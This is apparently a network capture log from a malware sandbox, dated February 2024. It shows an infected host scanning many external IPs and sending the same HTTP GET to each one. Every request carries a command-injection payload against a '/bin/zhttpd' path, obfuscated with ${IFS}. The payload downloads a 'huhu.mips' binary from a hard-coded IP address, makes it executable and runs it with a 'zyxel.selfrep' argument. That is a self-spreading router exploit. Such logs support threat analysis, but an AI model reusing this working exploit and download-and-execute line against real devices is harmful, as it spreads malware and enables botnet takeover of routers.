                                                      Feb 2, 2024 06:35:51.598670006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3924192.168.2.1446852185.109.174.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598705053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3925192.168.2.145430819.2.90.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598745108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3926192.168.2.1436330203.161.31.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598788977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3927192.168.2.1453272191.57.216.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598819017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3928192.168.2.1440228206.115.151.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598841906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3929192.168.2.145722092.249.171.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598879099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3930192.168.2.144356883.159.243.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598938942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3931192.168.2.1455546176.167.175.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598978043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3932192.168.2.144851482.124.139.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599021912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3933192.168.2.1435676108.194.244.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599076033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3934192.168.2.145468258.157.18.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599102974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3935192.168.2.1433508146.236.107.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599128008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3936192.168.2.143615650.213.166.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599158049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3937192.168.2.1439550163.244.56.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599209070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3938192.168.2.1436640101.47.76.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599222898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3939192.168.2.1459170169.120.23.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599266052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3940192.168.2.1435750125.216.200.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599324942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3941192.168.2.1455412168.154.159.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599356890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3942192.168.2.1455312130.82.114.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599400043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3943192.168.2.1452656106.186.54.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599450111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3944192.168.2.143990835.240.17.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599484921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3945192.168.2.144825434.68.3.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599529982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3946192.168.2.1450808217.54.4.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599560022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3947192.168.2.145435292.59.209.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599602938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3948192.168.2.145514293.100.49.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599627018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3949192.168.2.145745281.25.204.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599704981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3950192.168.2.1455686206.235.197.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599731922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3951192.168.2.1443224134.232.23.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599761009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3952192.168.2.1458466194.102.164.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599785089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3953192.168.2.1453586117.120.98.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599834919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3954192.168.2.1455366182.198.20.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599893093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3955192.168.2.1450900114.230.57.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599895000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3956192.168.2.144599443.160.190.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599957943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3957192.168.2.1460764211.111.252.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.599999905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3958192.168.2.1443282198.70.172.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600055933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3959192.168.2.1452342111.33.247.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600086927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3960192.168.2.145832414.156.136.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600153923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3961192.168.2.144262689.175.143.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600208044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3962192.168.2.143399644.98.13.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600239992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3963192.168.2.1439336172.90.95.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600281000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3964192.168.2.145336876.24.69.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600317001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3965192.168.2.1447536118.117.21.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600348949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3966192.168.2.1449280222.103.182.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600418091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3967192.168.2.143478647.217.109.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600440025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3968192.168.2.1439624123.172.197.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600471020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3969192.168.2.145461440.15.132.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600497961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3970192.168.2.1447978211.173.211.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600549936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3971192.168.2.1439828202.194.160.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600588083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3972192.168.2.1440128151.189.135.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600632906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3973192.168.2.143814865.145.42.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600678921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3974192.168.2.1433100194.253.193.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600697994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3975192.168.2.1451220132.71.29.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600728035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3976192.168.2.1459854120.143.93.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600774050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3977192.168.2.1449368162.180.31.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600800037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3978192.168.2.1455974196.150.250.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600857973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3979192.168.2.1435304210.127.160.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600902081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3980192.168.2.1433426120.48.156.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600954056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3981192.168.2.1445066159.166.99.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.600976944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3982192.168.2.1455042134.20.10.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601025105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3983192.168.2.143667682.187.162.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601061106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3984192.168.2.1450652221.95.157.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601104975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3985192.168.2.1444012149.196.39.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601140976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3986192.168.2.144207299.123.45.149443
                                                      TimestampBytes transferredDirectionData
